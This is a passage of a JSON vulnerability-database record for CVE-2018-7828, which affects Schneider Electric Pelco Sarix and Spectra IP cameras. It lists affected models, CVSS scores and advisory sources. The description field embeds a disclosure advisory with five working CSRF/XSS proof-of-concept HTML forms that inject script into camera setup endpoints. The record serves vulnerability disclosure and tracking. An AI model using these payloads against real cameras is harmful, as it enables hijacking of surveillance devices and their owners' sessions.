},
{
"model": "ime3122-b1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6230",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "ime119-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6230l",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "ime3122-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixe31",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-b1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6220",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "d6220l",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "d6230",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "d6230l",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ime119-1i",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ime119-1p",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ime119-1s",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imes19-1i",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imes19-1p",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imes19-1s",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "sarix/spectra cameras",
"scope": null,
"trust": 0.6,
"vendor": "pelco",
"version": null
},
{
"model": "electric spectra enhanced model: d6230 2.2.0.5.9340-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix model: id10dn 1.8.2.18-20121109-1.9110-o3.8503",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix model: d5230 1.9.2.23-20141118-1.9330-a1.10722",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix enhanced model: ime119 2.1.2.0.8280-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix enhanced model: ime219 2.1.2.0.8280-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric 1st gen pelco sarix enhanced camera",
"scope": null,
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric spectra enhanced ptz camera",
"scope": null,
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)"
},
{
"model": "pelco sarix/spectra cameras csrf enable ssh root access",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras csrf enable ssh root access",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras csrf enable ssh root access",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)"
},
{
"model": "pelco sarix/spectra cameras csrf enable ssh root access",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)"
},
{
"model": "pelco sarix/spectra cameras csrf enable ssh root access",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16262"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015521"
},
{
"db": "NVD",
"id": "CVE-2018-7828"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:schneider_electric:d6220_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:d6220l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:d6230_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:d6230l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:ime119-1i_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:ime119-1p_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:ime119-1s_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:imes19-1i_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:imes19-1p_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:imes19-1s_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015521"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Vulnerability discovered by Gjoko Krstic",
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
}
],
"trust": 0.3
},
"cve": "CVE-2018-7828",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2018-7828",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2017-23302",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2019-16262",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2018-7828",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-7828",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2018-7828",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2017-23302",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2019-16262",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201905-912",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "ZSL",
"id": "ZSL-2017-5417",
"trust": 0.1,
"value": "(4/5)"
},
{
"author": "ZSL",
"id": "ZSL-2017-5416",
"trust": 0.1,
"value": "(4/5)"
},
{
"author": "ZSL",
"id": "ZSL-2017-5415",
"trust": 0.1,
"value": "(3/5)"
}
]
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16262"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015521"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-912"
},
{
"db": "NVD",
"id": "CVE-2018-7828"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A Cross-Site Request Forgery (CSRF) vulnerability exists in the 1st Gen. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera when an authenticated user clicks a specially crafted malicious link while logged into the camera. Pelco Sarix Enhanced and Spectra Enhanced PTZ Camera Contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectricPelcoSarix/SpectraCameras has multiple cross-site scripting vulnerabilities that an attacker can exploit to execute arbitrary HTML and script code. SchneiderElectric1stGenPelcoSarixEnhancedCamera and SchneiderElectricSpectraEnhancedPTZCamera are products of Schneider Electric. SchneiderElectric1stGenPelcoSarixEnhancedCamera is a series of fixed IP cameras. The Schneider Electric SpectraEnhancedPTZCamera is a series of spherical IP cameras. The vulnerability stems from the fact that the web application did not fully verify that the request came from a trusted user. An attacker could exploit the vulnerability to send an unexpected request to the server through an affected client. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter \u0027enable_leds\u0027 locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0. \nSchneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities\n\n\nVendor: Schneider Electric SE\nProduct web page: https://www.pelco.com\nAffected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0)\n Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0)\n Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722)\n Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503)\n Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)\n\nSummary: Pelco offers the broadest selection of IP cameras designed\nfor security surveillance in a wide variety of commercial and industrial\nsettings. From our industry-leading fixed and high-speed IP cameras to\npanoramic, thermal imaging, explosionproof and more, we offer a camera\nfor any environment, any lighting condition and any application. \nWhen nothing but the best will do. SarixaC/ Enhanced Range cameras\nprovide the most robust feature-set for your mission-critical applications. \nWith SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image\nin difficult lighting conditions such as a combination of bright areas,\nshaded areas, and intense light. Designed with superior reliability,\nfault tolerance, and processing speed, these rugged fixed IP cameras\nensure you always get the video that you need. \n\nDesc: Pelco cameras suffer from multiple dom-based, stored and reflected\nXSS vulnerabilities when input passed via several parameters to several\nscripts is not properly sanitized before being returned to the user. \n\nTested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown\n MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)\n Lighttpd/1.4.28\n PHP/5.3.0\n\n\nVulnerability discovered by Gjoko \u0027LiquidWorm\u0027 Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2017-5415\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php\n\n\n07.04.2017\n\n--\n\n\nCSRF/XSS on username parameter:\n-------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/dot1x/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"dot1x\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"protocol\" value=\"EAP\u0026#45;TLS\" /\u003e\n \u003cinput type=\"hidden\" name=\"inner\u0026#95;auth\" value=\"CHAP\" /\u003e\n \u003cinput type=\"hidden\" name=\"username\" value=\u0027\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"password\" value=\"blah\" /\u003e\n \u003cinput type=\"hidden\" name=\"anonymous\u0026#95;id\" value=\"\u0026#13;\" /\u003e\n \u003cinput type=\"hidden\" name=\"ca\u0026#95;certificate\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"client\u0026#95;certificate\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"private\u0026#95;key\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"private\u0026#95;key\u0026#95;password\" value=\"test\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:\n-------------------------------------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/general/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"hostname\" value=\u0027\"\u003e\u003cscript\u003ealert(2)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"http\u0026#95;port\" value=\u0027\"\u003e\u003cscript\u003ealert(3)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"rtsp\u0026#95;port\" value=\u0027\"\u003e\u003cscript\u003ealert(4)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"dhcp\" value=\"off\" /\u003e\n \u003cinput type=\"hidden\" name=\"ip\u0026#95;address\" value=\u0027\"\u003e\u003cscript\u003ealert(5)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"subnet\u0026#95;mask\" value=\u0027\"\u003e\u003cscript\u003ealert(6)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"gateway\" value=\u0027\"\u003e\u003cscript\u003ealert(7)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"nameservers\" value=\u0027\"\u003e\u003cscript\u003ealert(8)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on version parameter:\n------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/snmp/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"version\" value=\u0027\";alert(9)//\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;community\u0026#95;string\" value=\"public\" /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;receiver\u0026#95;address\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;trap\u0026#95;community\u0026#95;string\" value=\"trapbratce\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:\n----------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/system/general/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"device\u0026#95;name\" value=\u0027ZSL\"\u003e\u003cscript\u003ealert(10)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;leds\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"smtp\u0026#95;server\" value=\u0027\"\u003e\u003cscript\u003ealert(11)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ntp\u0026#95;server\u0026#95;from\u0026#95;dhcp\" value=\"false\" /\u003e\n \u003cinput type=\"hidden\" name=\"ntp\u0026#95;server\" value=\"\u0027;alert(12)//\u0027\" /\u003e\n \u003cinput type=\"hidden\" name=\"region\" value=\"Macedonia\u0027;alert(13)//\" /\u003e\n \u003cinput type=\"hidden\" name=\"zone\" value=\"Kumanovo\u0027;alert(14)//\" /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;time\u0026#95;overlay\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;name\u0026#95;overlay\" value=\"off\" /\u003e\n \u003cinput type=\"hidden\" name=\"position\" value=\"topright\" /\u003e\n \u003cinput type=\"hidden\" name=\"date\u0026#95;format\" value=\"0\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nXSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:\n--------------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/events/handlers/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"id\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;sentinel\" value=\"relay\u0026#95;sentinel\" /\u003e\n \u003cinput type=\"hidden\" name=\"name\" value=\u0027\"\u003e\u003cscript\u003ealert(15)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"type\" value=\"Ftp\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;to\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;from\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;subject\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;message\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"dest\u0026#95;name\" value=\"IMG\u0026#37;m\u0026#37;d\u0026#37;Y\u0026#37;H\u0026#37;M\u0026#37;S\u0026#46;jpg\" /\u003e\n \u003cinput type=\"hidden\" name=\"limit\u0026#95;size\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"limit\u0026#95;size\u0026#95;scale\" value=\"K\" /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;server\" value=\u0027\"\u003e\u003cscript\u003ealert(16)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;username\" value=\u0027\"\u003e\u003cscript\u003ealert(17)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;password\" value=\u0027\"\u003e\u003cscript\u003ealert(18)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;base\u0026#95;path\" value=\u0027\"\u003e\u003cscript\u003ealert(19)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;dest\u0026#95;name\" value=\"IMG\u0026#37;m\u0026#37;d\u0026#37;Y\u0026#37;H\u0026#37;M\u0026#37;S\u0026#46;jpg\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;bankName\" value=\"GPIO\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;index\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;on\u0026#95;time\" value=\"0\u0026#46;1\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;off\u0026#95;time\" value=\"0\u0026#46;1\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;pulse\u0026#95;count\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"filter\u0026#95;start0\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"filter\u0026#95;stop0\" value=\"\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7828"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015521"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16262"
},
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "PACKETSTORM",
"id": "143313"
}
],
"trust": 3.06
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.zeroscience.mk/codes/pelco_rce.txt",
"trust": 0.1,
"type": "poc"
},
{
"reference": "https://www.zeroscience.mk/codes/pelco_csrf.txt",
"trust": 0.1,
"type": "poc"
},
{
"reference": "https://www.zeroscience.mk/codes/pelco_xss.txt",
"trust": 0.1,
"type": "poc"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-7828",
"trust": 3.2
},
{
"db": "SCHNEIDER",
"id": "SEVD-2019-045-03",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015521",
"trust": 0.8
},
{
"db": "EXPLOIT-DB",
"id": "42307",
"trust": 0.7
},
{
"db": "EXPLOITDB",
"id": "42307",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2017-23302",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2019-16262",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201905-912",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "143313",
"trust": 0.2
},
{
"db": "ZSL",
"id": "ZSL-2017-5415",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "143315",
"trust": 0.1
},
{
"db": "NVD",
"id": "CVE-2018-7829",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070080",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "42309",
"trust": 0.1
},
{
"db": "ZSL",
